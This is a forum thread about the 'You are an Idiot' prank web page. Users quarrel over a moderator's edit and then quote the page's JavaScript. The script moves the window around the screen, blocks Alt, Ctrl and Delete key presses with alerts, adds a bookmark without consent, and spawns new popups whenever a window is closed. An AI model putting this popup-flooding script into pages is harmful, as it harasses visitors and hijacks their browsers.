Warning Clicking This opens an annoying site! (http://www.originalicons.com/smile.html
)

How can they make it do that? Also I better put a large warning on how to get rid of it. You right click the menu link and exit off of it to get off the main. Then you have to use task man to end IExplorer.exe to get rid of the remanders...

I though I put allot of warnings up. I was wondering how you can make it do that and this was the best place for it.

kermi. If you are going to edit at least let them be able to go to the site if they want to. I'm asking a question so whats the point of deleting the important part of the question and leaving the thread going. You suck at moderating.

You suck at sucking up to the moderators, which is always a good idea.

WEll if he wants to ruin a thread I think he is a bad moderator. it was warnings on it. Just because he wasn't smart enough to read before he gets clicker happy doesn't mean he should ruin a thread with a legit question.

So edit your stupid post and put a link back in. He'll probably get mad. Go ahead. Try it.

Ok listen up dumbass. I'm the one that clicked it and im the one who asked him to do something about it. This thread serves no purpose but for you to get your kicks on people who click it to try and answer your questions.

Kermi is a friend of mine and is in no way a bad moderator. He makes good choices and only does what he feels is best for the community.

You are the idiot, and if that is the attitude we can expect from you tword our moderators and staff i suggest you find another website to spend your time on. You do nothing but make yourself look like an undereducated $$$$$$$ in this thread, removing it would be doing you a favor.

Well you get a cool 404 error, lol. ZakkWylde969 is a tool and gave you a wrong link. Take our the <br /> from the end of it so you get smile.html. Its just a stupid little joke. Just end it in task manager...

I'd be glad to explain what it does. None seemed to ask me that question before you started getting $$$$$y... When you click it a window comes up that says "You are an Idiot" With a smily face under it. And the screens rolls around on the moniter. Then after you get that and exit like 40 small IExplorer.exe pop ups pop up. It's easy to end I was just curious on how it worked and since there isn't a web design forum I just put it here.

And Also I PUT A WARNING UP. I said it before and I will say it again. Read before you click.

Thats what I was wondering. Because I haven't seen anyting in my HTML book that says you can make it do that. Is it some Java thing?

its not likely to be html, although with some talent u could use html i think. Its more likely java or one of those other ones.

Whats really funny is that no new windows appeared. There was just one ghey window moving around. And I have IE6[SP1]!

I would guess javascript...setting the coords of a window sounds familiar to me...

No need, just view the html source, and go from there ;)

<body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
And the Javascript to make it happen:

function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="http://www.originalicons.com/";
var title="OriginalIcons.com!!";
window.external.AddFavorite(url,title);
}
}

function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); }
function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); }

var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;

function openWindow(url){
aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width =180,height=175,titlebar=no,alwaysRaised=yes');
}

function procreate(){
openWindow('smile.html');
openWindow('smile.html');
openWindow('smile.html');
openWindow('smile.html');
openWindow('smile.html');
openWindow('smile.html');
}

function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}

function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}

function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
}

function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}
function fOff(){
flagrun = 0;
}

function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos < 0){
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos < 0){
newYdn();
}
if (flagRun == 1){
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
}

And finally, the animation:
